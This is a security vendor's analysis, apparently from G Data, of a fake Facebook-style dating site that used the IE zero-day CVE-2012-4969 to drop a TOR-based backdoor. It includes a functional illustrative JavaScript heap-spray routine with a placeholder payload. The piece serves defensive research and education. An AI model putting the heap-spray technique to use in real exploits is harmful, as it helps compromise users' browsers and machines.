A dating website designed to resemble the popular Facebook layout has been prepared to attack visitors using the newly discovered vulnerability in Microsoft’s Internet Explorer versions 6 to 9. The vulnerability is described in CVE-2012-4969.
The German Federal Office for Information Security (BSI) rated the 0-day as a severe problem and even warned German citizens not to use Microsoft’s browser until the software vendor issued a security update.
The current case
A detailed analysis of the current case will follow soon!
So far we can say the following:
- The initial site uses a highly obfuscated JavaScript that prepares the memory for the attack with a heap spray if the visiting computer runs IE 8.x on Windows.
The heap spray code is detected by G Data as JS:Exploit.JS.Agent.AR.
⇒ This method, using JavaScript, differs from the initial PoC, which used Flash to prepare the memory, as a fellow researcher initially pointed out.
- An embedded iframe (URL on the same domain) loads the 0-day exploit.
The exploit is detected by G Data as JS:CVE-2012-4969-A [Expl].
- The shellcode downloads a binary from the same server and executes it.
- This file downloads another binary from the same server and also executes it.
- This second binary appears to be a normal TOR client, connecting to a TOR hidden service that acts as the command and control server.
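The following JavaScript is an added illustration of the preparation step the first bullet describes, not the obfuscated script from the analysed site and not G Data's detection logic. It shows the classic heap-spray idea: fill the heap with many identically sized chunks that each consist of a long sled followed by the payload, so that a corrupted pointer landing anywhere in the sprayed region slides into the payload. Every constant in it is an assumption (the 0x0c sled byte, 0x1000-byte chunks, the placeholder payload string, the spray base address and the target address 0x0c0c0c0c); none of these values were recovered from the sample. It runs under Node.js; the browser allocation behaviour is only modelled arithmetically.

```javascript
"use strict";

// Added illustration of a JavaScript heap spray. Not the sample's code; all
// constants are assumptions that mirror the classic technique. The sled byte
// 0x0c is used because "0c 0c" decodes on x86 as "or al, 0x0c", which is
// harmless, so execution slides through the sled into the payload.

const SLED_SEED = "%u0c0c%u0c0c";   // unescape() turns this into two UTF-16 code units of 0x0c0c
const CHUNK_CHARS = 0x800;          // 0x800 code units = 0x1000 bytes per chunk (assumed size)
const FAKE_PAYLOAD = "<SHELLCODE>"; // placeholder only; no real shellcode is included

// Build one chunk: sled first, payload last, exactly chunkChars code units long.
function buildChunk(payload, chunkChars) {
  let sled = unescape(SLED_SEED);
  // Classic doubling loop: grow the sled until it covers the whole chunk.
  while (sled.length < chunkChars) sled += sled;
  // Trim so that sled + payload fills the chunk exactly; identical chunk sizes
  // are what make the resulting heap layout predictable.
  return sled.substring(0, chunkChars - payload.length) + payload;
}

// Fill an array with `count` chunks. In the browser each element becomes a
// separate heap allocation; here the array only models the layout.
function spray(payload, count, chunkChars) {
  const blocks = [];
  for (let i = 0; i < count; i++) {
    blocks.push(buildChunk(payload, chunkChars));
  }
  return blocks;
}

// Model where a dereference of `target` lands once the region starting at
// `sprayBase` is filled with back-to-back chunks of chunkChars*2 bytes.
// Assumed simplification: no allocation headers and no gaps between chunks.
// Returns true if the address falls inside the sled part of a chunk, i.e.
// execution would slide into the payload rather than land in its middle.
function landsInSled(target, sprayBase, chunkChars, payloadChars) {
  if (target < sprayBase) return false;
  const chunkBytes = chunkChars * 2;
  const sledBytes = (chunkChars - payloadChars) * 2;
  const offsetInChunk = (target - sprayBase) % chunkBytes;
  return offsetInChunk < sledBytes;
}

// Stand-alone run. 0x0c0c0c0c is the usual target in such sprays because the
// sled bytes themselves form that value when they overwrite a pointer (assumed).
const heap = spray(FAKE_PAYLOAD, 200, CHUNK_CHARS);
console.log("chunks:", heap.length, "chunk length:", heap[0].length);
console.log("0x0c0c0c0c in sled:",
  landsInSled(0x0c0c0c0c, 0x0a000000, CHUNK_CHARS, FAKE_PAYLOAD.length));
```

Two points the arithmetic makes visible: the chunk size must stay constant, otherwise the offset of the target address inside a chunk is no longer fixed, and the payload must be small relative to the chunk, because if the target's offset within the chunk is larger than the sled, execution starts in the middle of the shellcode and the exploit simply crashes (`landsInSled` returns false for a 0x400-character payload with the same target). In a real browser, allocation headers and the engine's string representation shift these offsets, which is why such sprays are tuned per browser version, matching the "IE 8.x on Windows" condition in the analysed script.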
Microsoft reacted quickly: within a short period of time it issued instructions on mitigating factors, a Fix it, and an update for the affected Internet Explorer versions!
What do we learn from that?
- The 0-day exploit has been adopted and adapted by the underground community!
- The Flash file is no longer an essential part of preparing the memory for the exploit.
- The quality of the payloads suggests that this is not the work of script kiddies.
- We suspect that it won’t take long before attackers include the attack in exploit packs.
What you can do:
- Install the update Microsoft released on 21 September 2012!
- Remain suspicious: do not click on links or file attachments in emails and social networks without pausing to think first. The files or the website could carry malicious code. If a message from a friend seems strange, first check whether it is authentic.
- Use an up-to-date, comprehensive security solution with a virus scanner, firewall, web protection and real-time protection. A spam filter that keeps unwanted mails out of your inbox also makes sense.
Want information about the analyzed website and samples? Contact: samplerequest [at] gdata.de